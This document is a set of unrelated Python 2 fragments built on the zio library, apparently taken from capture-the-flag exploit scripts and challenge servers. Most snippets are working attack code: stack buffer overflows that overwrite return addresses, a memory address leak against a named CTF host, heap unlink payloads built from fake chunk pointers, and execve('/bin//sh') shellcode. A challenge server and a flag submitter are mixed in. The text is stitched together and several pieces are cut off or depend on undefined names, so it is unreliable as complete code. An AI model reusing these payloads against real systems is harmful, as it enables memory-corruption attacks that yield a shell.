def submit_flag(flag): # flags are now submitted using one connection per flag # whilst testing systems allow submitting multiple flags # during one connection. TODO log.debug("Submitting flag %s", flag) try_number = 0 while True: try_number += 1 try: connection = zio.zio( (HOST, PORT), print_read=False, print_write=False) break except: log.debug("Unsuccessful connection attempt") if try_number % 10 == 0: log.error("%d unsuccessful connections in a row", try_number) time.sleep(0.3) connection.read_line() # jury greeting connection.write(flag + "\n") response = connection.read().strip() connection.close() log.debug("Response for %s: '%s'", flag, response) for verdict, message in VERDICT_MESSAGES: if message in response: return verdict
def run(self): io = zio.zio(self.__zio_target, print_read=self.__zio_print_read, print_write=self.__zio_print_write, timeout=self.__zio_timeout) self.recv_welcome(io) last_ques = '' last_ans = '' for level in self.level_list: for i in xrange(level.round): this_ques, this_ans = level.run(io) level.write_cache(last_ques, last_ans) last_ques = this_ques last_ans = this_ans io.interact()
def show(): global io io.writeline('4') def add_tv(name, season=0, rating=0, intro='A'): global io io.writelines(['1', name, str(season), str(rating), intro]) def remove(name): global io io.writelines(['3', name]) io = zio.zio(TARGET) add_tv('A') add_tv('B') add_tv('A') add_tv('B') io.interact() # remove('A') # io.read_until_timeout() # show() # io.read_until('TV <') # remove(io.read_until('> season')[:-len('> season')]) # raw_input()
#!/usr/bin/env python # encoding:utf-8 import zio payload = "A" * 128 Io = zio.zio("./a.out") Io.writeline(payload) Io.interact()
import zio import struct import time #T = ("127.0.0.1",4444) T = ("library.polictf.it",80) io = zio.zio(T) off_addr_ebp = -35 #set offset io.read_until("exit") io.write("a\n") io.read_until("title:") io.write(str(off_addr_ebp-1) + "\n") payload = "AAAA" io.write(payload + "\n") #get addr io.read_until("exit") io.write("r\n") io.read_until("read:") io.write("1\n") io.read(1) #read 1 byte here res = io.read(4) addr_ebp = struct.unpack("<I",res)[0] print "\nebp:",hex(addr_ebp) #addr of buffer addr_buf = addr_ebp - 1037 print 'addr buf:',hex(addr_buf)
def edit(index, size=None, buf=None): global io if buf is None: io.writelines(['3', str(index), str(size)]) io.write(NOPS(size)) else: io.writelines(['3', str(index), str(len(buf))]) io.write(buf) def delete(index): global io io.writelines(['4', str(index)]) io = zio.zio(TARGET) new(0x100) # id = 0 new(0x100) # id = 1 new(0x10) # id = 2 new(0x10) # id = 3 new(0x200) # id = 4 payload = zio.l64(0x100) payload += zio.l64(0x100) payload += zio.l64(0x6016C0 + 0x28 - 0x18) payload += zio.l64(0x6016C0 + 0x28 - 0x10) payload += zio.l64(0) * 2 edit(1, buf=payload) # raw_input()
import zio junk = "AAAABBBBCCCCDDDDEEEEFFFFGGGG" shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\xb0\x0b\x89\xe3\x31\xc9\x31\xd2\xcd\x80" Io = zio.zio("./main") address = zio.l32(int(Io.readline().replace("Address : 0x", "")[0:8], 16)) payload = (shellcode + junk)[0:len(junk)] + address Io.interact()
import zio junk = "A" * 0x88 address = "\x96\x05\x40\x00\x00\x00\x00" payload = junk + address # Io = zio.zio("./level0") Io = zio.zio(("pwn2.jarvisoj.com", 9881)) Io.write(payload) Io.interact()
def handle(self): print 'get connection from',self.client_address self.request.settimeout(10) self.wfile.write('TOKEN=') self.token = self.rfile.readline().strip() print 'TOKEN='+self.token if '' == self.token: self.wfile.write('\n\nwrong token\n') return print 'serving team {'+self.token+'} from ',self.client_address self.request.settimeout(50) self.wfile.write('GeruzoniAnsasu的舍友M大大最近去旁听了编译原理,回来问了一个问题把大家都难住了:\n') #sleep(0.6) self.wfile.write('为啥处理语法树的时候要有人为规定的优先级?\n') #sleep(0.6) self.wfile.write('如果优先级重新定义的话……\n\n') self.rfile.readline() self.wfile.write('example: 2*4+5\n') self.wfile.write(' (2*4)+5 = 13\n') self.wfile.write(' 2*(4+5) = 18\n\n') #sleep(0.6) self.wfile.write('那么所有这些情况的结果和是多少呢?(31)\n') if self.rfile.readline().strip() != '31': return self.wfile.write('\n\n先来熟悉熟悉吧:\n') #sleep(0.8) smps = (('1*2+3',10),('4-3+7',2),('9*3-5',4),('6+7*8',166),('15+3*8-7',255),('3*8+11+4',316)) for i in range(3): t1 = time() s,v = smps[randrange(6)] self.wfile.write(s+' sum = ?\n') ans = int(self.rfile.readline().strip()) t2 = time() if ans != v or t2-t1 > 50: self.wfile.write('噫……\n') return #sleep(0.5) self.wfile.write('\n\n还可以,我感觉你已经理解意思了。\n') #sleep(0.8) self.wfile.write('现在让我们换一种表达方式,如下:\n\n') self.wfile.write('6[2,5,10,9,3,34]++*-*\n') self.wfile.write('答案159001\n\n') #sleep(0.3) self.wfile.write('以防数字太大,所有答案mod 1e9+7.\n') self.rfile.readline() #sleep(0.1) self.wfile.write('那么,lv1,计时开始:)\n\n') self.request.settimeout(self.TO_LV1) #sleep(0.3) self.wfile.write('2[0,10]- \n') ans = int(self.rfile.readline().strip()) if ans != 999999997: self.wfile.write('再想想\n') return seed(time()) sz_calc = '' sz_send = '' print '--LV1--' for i in xrange(randrange(5,8)):#5到8组 LV1 break n = randrange(8,18)#8到18个数 sz_calc = str(n)+'\n' sz_send = str(n) l = [] for j in xrange(n): num = randrange(1e9+7) sz_calc += str(num)+' ' l.append(num) sz_calc += '\n' sz_send += repr(l) for j in xrange(n-1): sign = ops[randrange(3)] sz_calc += sign sz_send += sign io = zio.zio('./calc',print_read = lambda x:'',print_write = lambda x:'') io.writeline(sz_calc) right_ans = int(io.readline().strip()) print 'R->',right_ans self.wfile.write(sz_send+'\n') #continue ans = int(self.rfile.readline().strip()) print '<-A',ans if ans != right_ans: return io.close() print '--LV2--' self.wfile.write('可喜可贺!\nlv2,时限更严:)\n\n')#LV2 self.request.settimeout(self.TO_LV2) for i in xrange(randrange(10,20)):#10到20组 n = randrange(12,30)#12到30个数 sz_calc = str(n)+'\n' sz_send = str(n) l = [] for j in xrange(n): num = randrange(1e9+7) sz_calc += str(num)+' ' l.append(num) sz_calc += '\n' sz_send += repr(l) for j in xrange(n-1): sign = ops[randrange(3)] sz_calc += sign sz_send += sign io = zio.zio('./calc',print_read = lambda x:'',print_write = lambda x:'') io.writeline(sz_calc) right_ans = int(io.readline().strip()) print 'R->',right_ans self.wfile.write(sz_send+'\n') #continue ans = int(self.rfile.readline().strip()) print '<-A',ans if ans != right_ans: print ':(' return io.close() print '--LV3--' self.wfile.write('有希望看到flag了!\nlv3,证明你是精英的时候:)\n\n')#LV3 self.request.settimeout(self.TO_LV3) for i in xrange(10):#30组 n = randrange(90,150)#90到150个数 sz_calc = str(n)+'\n' sz_send = str(n) l = [] for j in xrange(n): num = randrange(1e9+7) sz_calc += str(num)+' ' l.append(num) sz_calc += '\n' sz_send += repr(l) for j in xrange(n-1): sign = ops[randrange(3)] sz_calc += sign sz_send += sign io = zio.zio('./calc',print_read = lambda x:'',print_write = lambda x:'') io.writeline(sz_calc) right_ans = int(io.readline().strip()) print 'R->',right_ans self.wfile.write(sz_send+'\n') #continue ans = int(self.rfile.readline().strip()) print '<-A',ans if ans != right_ans: return io.close() print '--LV4--' self.wfile.write('\nINSANE!!\n\n')#LV4 self.request.settimeout(self.TO_LV4) for i in xrange(2): n = randrange(700,900)#700到900个数 sz_calc = str(n)+'\n' sz_send = str(n) l = [] for j in xrange(n): num = randrange(1e9+7) sz_calc += str(num)+' ' l.append(num) sz_calc += '\n' sz_send += repr(l) for j in xrange(n-1): sign = ops[randrange(3)] sz_calc += sign sz_send += sign io = zio.zio('./calc',print_read = lambda x:'',print_write = lambda x:'') io.writeline(sz_calc) right_ans = int(io.readline().strip()) print 'R->',right_ans self.wfile.write(sz_send+'\n') #continue ans = int(self.rfile.readline().strip()) print '<-A',ans if ans != right_ans: return io.close() self.wfile.write('here you got the flag, but i removed some code from original file.\n') print 'team {%s} got the flag.' % self.token